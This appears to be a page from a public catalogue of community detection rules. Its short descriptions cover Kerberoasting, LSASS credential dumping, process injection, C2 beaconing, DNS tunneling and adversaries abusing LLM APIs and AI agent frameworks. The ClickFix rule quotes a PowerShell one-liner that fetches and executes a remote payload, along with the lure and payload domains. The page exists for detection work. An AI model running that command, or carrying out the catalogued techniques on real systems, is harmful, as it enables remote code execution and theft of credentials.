Detections
Explore public detection logic contributed by the community across SIEM and rule languages.
39,252 detections
Filters
Last updated
All Time
Detection languages
14,996
13,546
2,513
1,803
1,722
Contributors
7,678
6,007
5,306
4,504
4,026
Categories
17,755
9,465
3,749
3,677
3,674
Platforms
39,252
6,892
6,432
3,782
3,524
Products / Services
10,159
9,415
6,493
1,858
1,706
MITRE Techniques
13,649
12,957
7,908
5,843
4,364
CVEs
50
45
30
30
29
IDS Classtypes
214
56
36
24
19
IDS Protocols
177
171
20
17
8
This rule detects potential Kerberoasting activity by monitoring Kerberos TGS requests (Event ID 4769) that use RC4 encryption (0x17 or 17). It identifies accounts requesting TGS tickets for a large number of unique Service Principal Names (SPNs), excluding requests for host-based services (ending in $). High volumes of such requests from a single user are indicative of an attempt to gather service tickets for offline password cracking.
This rule detects potential AS-REP Roasting attempts by identifying an unusually high volume of Kerberos AS-REQ requests (Event ID 4768) where the preauthentication type is set to 0. These requests are grouped by source IP or client address, and alerts are triggered when the number of unique accounts targeted or the total request count exceeds defined thresholds. AS-REP Roasting is an attack technique that attempts to retrieve a TGT for user accounts that have Kerberos preauthentication disabled, making them susceptible to offline brute-force password cracking.
This rule detects potential Kerberoasting activity by monitoring Kerberos TGS requests (Event ID 4769) that use RC4 encryption (0x17 or 17). It identifies accounts requesting TGS tickets for a large number of unique Service Principal Names (SPNs), excluding requests for host-based services (ending in $). High volumes of such requests from a single user are indicative of an attempt to gather service tickets for offline password cracking.
This rule detects potential AS-REP Roasting attempts by identifying an unusually high volume of Kerberos AS-REQ requests (Event ID 4768) where the preauthentication type is set to 0. These requests are grouped by source IP or client address, and alerts are triggered when the number of unique accounts targeted or the total request count exceeds defined thresholds. AS-REP Roasting is an attack technique that attempts to retrieve a TGT for user accounts that have Kerberos preauthentication disabled, making them susceptible to offline brute-force password cracking.
Detects persistence modification via Registry Run/RunOnce keys or the addition of suspicious files to the Windows Startup folder. The rule specifically monitors for registry values pointing to common volatile directories, script extensions, or suspicious command-line interpreters. It also flags new executables or scripts being written directly into startup directory paths. This rule covers both direct registry manipulation and startup folder placement, often associated with malware or adversary persistence mechanisms.
Detects anomalous Kerberos TGT (AS-REQ/AS-REP) activity using Event ID 4768. The rule identifies two scenarios: (1) TGT requests that fail with specific status codes indicating issues with the account (disabled, nonexistent, or locked), and (2) TGT requests that utilize RC4 encryption with classic Golden Ticket flags (renewable/forwardable). These patterns are indicative of potential Kerberos abuse, including attempts to use compromised accounts or forged golden tickets.
This rule detects potential process injection activity where a process is created in a suspended state and subsequently performs memory unmapping followed by a remote memory write operation. This behavior targets critical system processes such as svchost, explorer, lsass, services, and spoolsv, which is highly indicative of process hollowing or similar injection techniques used by malicious actors.
Detects the creation of a remote thread in a process by another process, excluding self-injection. This behavior is a common indicator of process injection techniques used to execute code within the address space of a target process.
Detects processes attempting to obtain high-privileged handles (e.g., VM_READ/ALL_ACCESS) to the lsass.exe process. Accessing lsass.exe is a common method for credential dumping, often used by malware or red-team tools to extract sensitive credentials from memory. This rule monitors process access events and ignores known benign or administrative processes that legitimately access LSASS.
This rule detects potential command-and-control (C2) activity by correlating the creation of known Cobalt Strike or Sliver framework named pipes with subsequent repeated HTTP/S network beaconing from the same process or host. The rule identifies processes establishing suspicious named pipes, then looks for persistent network connections to standard web ports (80, 443) within a 30-minute window, flagging instances where significant beaconing count is observed.
This rule detects potential DNS tunneling activities often used for Command and Control (C2) communication. It monitors for high volumes of DNS requests involving records commonly abused for tunneling (TXT, NULL, CNAME) from a single host to a specific parent domain. It further identifies suspicious patterns characterized by long, high-entropy subdomain labels (>45 characters) and a high frequency of distinct labels, which are indicative of encoded C2 traffic.
Detects the loading of known vulnerable kernel drivers commonly used for Bring Your Own Vulnerable Driver (BYOVD) attacks, followed within 15 minutes by administrative attempts to stop, delete, or kill common security product processes or services.
Detects a non-browser process initiating network connections to four distinct commercial LLM API providers (DeepSeek, OpenRouter, Mistral, and Google Gemini) within a 5-minute interval. This behavior is indicative of a C2 pattern where an adversary uses multiple LLM backends to perform plurality-vote or redundant queries, bypassing typical browser-based AI aggregation services.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
This rule detects the execution of browser automation and testing tools (such as Playwright, Puppeteer, Selenium, and various browser drivers) when initiated by common, non-development-related parent processes like Microsoft Office applications, Explorer, or service hosts. This behavior is indicative of potential malicious activity, such as automated credential harvesting or unauthorized web interaction initiated by a compromised document or process.
Detects execution of PowerShell or Python scripts characterized by common patterns found in AI-generated code, including specific obfuscation techniques (base64, string manipulation), boilerplate error handling structures, verbose comments, and generic variable naming conventions. High scores indicate a higher probability of automated or obfuscated script execution.
Detects the execution of known living-off-the-land binaries or network utilities initiated by or involving processes related to the Semantic Kernel framework (e.g., SKAgent, kernel.run). This pattern is often indicative of automated execution, potentially associated with agent-based activity or malicious orchestration leveraging AI framework components.
Detects anomalous executions of ctfmon.exe that deviate from known-good parent process patterns, such as unexpected parent processes (e.g., script hosts, LOLBins) or execution from locations other than C:\Windows\System32\ctfmon.exe. This rule is designed to help identify potential masquerading or process injection associated with exploitation attempts, including CVE-2026-45586.
Detects removable-media/storage interaction events initiated by the PlugX side-loaded process chain (GRrte.exe / Jarte.exe), consistent with the PlugX core's drive-type query and removable-media ejection behavior (GetDriveTypeW / DeviceIoControl)
Detects the use of PowerShell to modify Microsoft Defender antivirus preferences by adding exclusion paths or processes. This behavior is indicative of an attacker attempting to bypass security software detection by excluding their malicious tools or staging areas from scanning.
Detects the installation of unauthorized AI-related browser extensions followed by outbound network communication from the browser process to known external AI service API endpoints within one hour. This behavior is indicative of potential data exfiltration via shadow AI tools, bypassing standard enterprise DLP controls.
Page 78 of 1870





